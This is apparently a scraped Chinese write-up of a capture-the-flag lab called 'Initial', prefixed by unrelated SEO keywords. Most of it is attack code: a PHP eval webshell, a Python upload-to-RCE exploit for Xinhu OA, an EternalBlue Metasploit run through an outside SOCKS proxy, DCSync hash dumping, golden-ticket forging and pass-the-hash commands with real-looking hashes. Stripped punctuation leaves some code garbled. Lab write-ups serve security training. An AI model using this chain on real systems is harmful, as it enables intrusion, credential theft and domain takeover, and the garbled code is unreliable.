滨海做网站哪家好,源码下载网站cms,那个网站做外贸好,做网站怎么去工信部缴费文章目录 春秋云境—Initial一、前期准备1、靶标介绍2、相关设备 二、WEB渗透1、ThinkPHP RCE#xff08;1#xff09;、打开网站#xff08;2#xff09;、检测漏洞 2、蚁剑连接3、sudo提权4、frpc代理5、fsacn扫描 三、后渗透1、信呼OA RCE#xff08;1#xff09;、1.… 文章目录 春秋云境—Initial一、前期准备1、靶标介绍2、相关设备 二、WEB渗透1、ThinkPHP RCE1、打开网站2、检测漏洞 2、蚁剑连接3、sudo提权4、frpc代理5、fsacn扫描 三、后渗透1、信呼OA RCE1、1.php木马2、exp.py漏洞脚本3、查看路径 2、蚁剑连接3、永恒之蓝4、DCSync1、DCSync简介2、导出域内所有用户Hash3、生成黄金票据4、导入黄金票据5、HASH传递 春秋云境—Initial
一、前期准备
1、靶标介绍 Initial是一套难度为简单的靶场环境完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag各部分位于不同的机器上。 2、相关设备
设备名称IP地址Web39.98.120.156172.22.1.15XIAORANG-OA01172.22.1.18XIAORANG-WIN7172.22.1.21DC01172.22.1.2
二、WEB渗透
1、ThinkPHP RCE
1、打开网站
http://39.98.120.156/2、检测漏洞 2、蚁剑连接 3、sudo提权
(www-data:/tmp) $ sudo -l
(www-data:/tmp) $ sudo mysql -e \! cat /root/flag/flag01.txt4、frpc代理
(www-data:/var/www/html) $ cd /tmp/
(www-data:/tmp) $ chmod x frpc*
(www-data:/tmp) $ ./frpc -c ./frpc.ini5、fsacn扫描
(www-data:/var/www/html) $ cd /tmp/
(www-data:/tmp) $ chmod x fscan
(www-data:/tmp) $ ./fscan -h 172.22.1.0/24172.22.1.2:445 open
172.22.1.2:135 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.18:80 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.18:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:88 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.18:3306 open
[] NetInfo:
[*]172.22.1.21[-]XIAORANG-WIN7[-]172.22.1.21
[] NetInfo:
[*]172.22.1.18[-]XIAORANG-OA01[-]172.22.1.18
[*] WebTitle:http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] 172.22.1.2 []DC XIAORANG\DC01 Windows Server 2016 Datacenter 14393
[] 172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] 172.22.1.21 XIAORANG\XIAORANG-WIN7 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[] NetInfo:
[*]172.22.1.2[-]DC01[-]172.22.1.2
[*] 172.22.1.18 XIAORANG\XIAORANG-OA01 Windows Server 2012 R2 Datacenter 9600
[*] WebTitle:http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?mlogin
[*] WebTitle:http://172.22.1.18?mlogin code:200 len:4012 title:信呼协同办公系统
[] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1三、后渗透
1、信呼OA RCE
1、1.php木马
?php eval($_POST[1]);?2、exp.py漏洞脚本
import requestssession requests.session()url_pre http://172.22.1.18/
url1 url_pre ?acheckmlogindajaxbooltruernd533953
url2 url_pre /index.php?aupfilemuploaddpublicmaxsize100ajaxbooltruernd798913
url3 url_pre /task.php?mqcloudCos|runtarunfileid11data1 {rempass: 0,jmpass: false,device: 1625884034525,ltype: 0,adminuser: YWRtaW4,adminpass: YWRtaW4xMjM,yanzm:
}r session.post(url1, datadata1)
r session.post(url2, files{file: open(1.php, r)})filepath str(r.json()[filepath])
filepath / filepath.split(.uptemp)[0] .php
id r.json()[id]url3 url_pre f/task.php?mqcloudCos|runtarunfileid{id}r session.get(url3)
r session.get(url_pre filepath ?1system(dir);)
print(r.text)3、查看路径 2、蚁剑连接 3、永恒之蓝
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set rhost 172.22.1.21
set proxies socks5:116.196.88.132:6001
exploit 4、DCSync
1、DCSync简介 在DCSync技术没有出现之前攻击者要想拿到域内用户的hash就只能在域控制器上运行 Mimikatz 或 Invoke-Mimikatz去抓取密码hash但是在2015 年 8 月份 Mimkatz新增了一个主要功能叫DCSync使用这项技术可以有效地 “模拟” 域控制器并从目标域控上请求域内用户密码hash。 域控制器DC是 Active Directory(AD) 域的支柱用于管理域内用户。在现实场景中为了防止 DC 崩溃导致连带域内瘫痪会额外布置多台域控制器。当出现了多台域控制器时为了实现数据同步不同域控制器DC之间每 15 分钟都会有一次域数据的同步当 DC1 想从 DC2 获取数据时DC1 会向 DC2 发起GetNCChanges请求该数据包包含需要同步的数据。
DCSync则是通过上述原理利用 Directory Replication ServiceDRS服务的GetNCChanges接口向域发起数据同步请求。
windows 域默认可以运行以下组内用户登陆到域控中
Enterprise Admins (目录林管理员组)
Domain Admins(域管理员组)
Administrators
Backup Operators
Account Operators
Print Operators如果一个攻击者能够拿下以上组中的一个账户整个活动目录就可能被攻陷因为这些用户组有登陆到域控的权限,除此之外还需要提权到 system 权限。
2、导出域内所有用户Hash
load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv3、生成黄金票据
meterpreter kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /user:krbtgt4、导入黄金票据
kiwi_cmd kerberos::golden /user:administrator /domain:xiaorang.lab /sid:S-1-5-21-314492864-3856862959-4045974917-502 /krbtgt:fb812eea13a18b7fcdb8e6d67ddc205b /ptt5、HASH传递
proxychains4 impacket-wmiexec -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang/administrator172.22.1.2 type Users\Administrator\flag\flag03.txt
